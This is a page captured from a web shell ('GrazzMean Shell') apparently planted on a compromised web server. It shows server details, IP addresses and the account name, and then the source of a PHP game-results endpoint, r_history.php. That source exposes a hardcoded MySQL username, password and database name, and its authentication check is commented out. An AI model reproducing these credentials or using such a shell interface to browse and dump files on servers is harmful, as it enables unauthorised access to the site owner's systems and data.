shell bypass 403

GrazzMean Shell

Uname: Linux server.thebazaar99.com 5.14.0-687.17.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jun 22 07:21:26 EDT 2026 x86_64
Software: Apache
PHP version: 8.3.32 [ PHP INFO ] PHP os: Linux
Server Ip: 163.227.92.254
Your Ip: 216.73.217.24
User: gutlooks (1003) | Group: gutlooks (1005)
Safe Mode: OFF
Disable Function:
exec,passthru,shell_exec,system

name : r_history.php
<?php
   $conn=mysqli_connect('localhost','gutlooks_popye','uBzA}1b3q=UO','gutlooks_opjojo');
   
    // if(isset($_POST['p_id']) && isset($_POST['token']) && isset($_POST['pin']))
    //             {
                    // $deviceToken = $_POST['token'];
                    // $firebaseId  = $_POST['p_id'];
                    // $secretKey  = $_POST['pin'];
                
                // $p_id = $admin->verifyCredentials($deviceToken, $secretKey, $firebaseId);
                //     if($p_id)
                //     {  
//   $_POST['year'] = "2021";
//   $_POST['month'] = "07";
   if(isset($_POST['year']) && isset($_POST['month']))
    {
        $today=date('Y-m-d');
        $date=$_POST['year'].'-'.$_POST['month'].'-01';
        $d=cal_days_in_month(CAL_GREGORIAN,$_POST['month'],$_POST['year']);
        $j=0; $data=array(); 
        for($i=1;$i<=$d;$i++)
        {
           $gamedate = date('Y-m-d', strtotime($date . ' +'.$j.' day'));   
           if($today>=$gamedate){
           $game=mysqli_query($conn,"select * from game");
           if(mysqli_num_rows($game)>0)
           {
               $k=0;
            while($row=mysqli_fetch_assoc($game))
            {
                $gameid=$row['g_id'];
                $data[$j][$k]['game_id']=$row['g_id'];
                $data[$j][$k]['date']=$gamedate;  
                $data[$j][$k]['game']=$row['g_name'];
                $result=mysqli_query($conn,"select * from result where game_id ='$gameid' and date = '$gamedate' and status = '1'");
                if(mysqli_num_rows($result)>0)
                {
                    $result_row=mysqli_fetch_assoc($result);
                    $data[$j][$k]['result']=$result_row['result'];
                    
                }
                else
                {
                   $data[$j][$k]['result']='XX'; 
                }
            $k++;}
        }
        else
        {
            echo json_encode(array('status'=>"0","response"=>array(),"msg"=>"No data found"));  die;
        }
        }
        $j++;}
        echo json_encode(array("status"=>"1","response"=>$data,"msg"=>"data found"));
        
    }
    else
    {
        echo json_encode(array('status'=>"0","response"=>array(),"msg"=>"No data found"));
    }
                    // }
                    // else
                    // {
                    //     echo json_encode(array('status'=>"0","response"=>array(),"msg"=>"No data found"));
                    // }
                
?>
© 2026 GrazzMean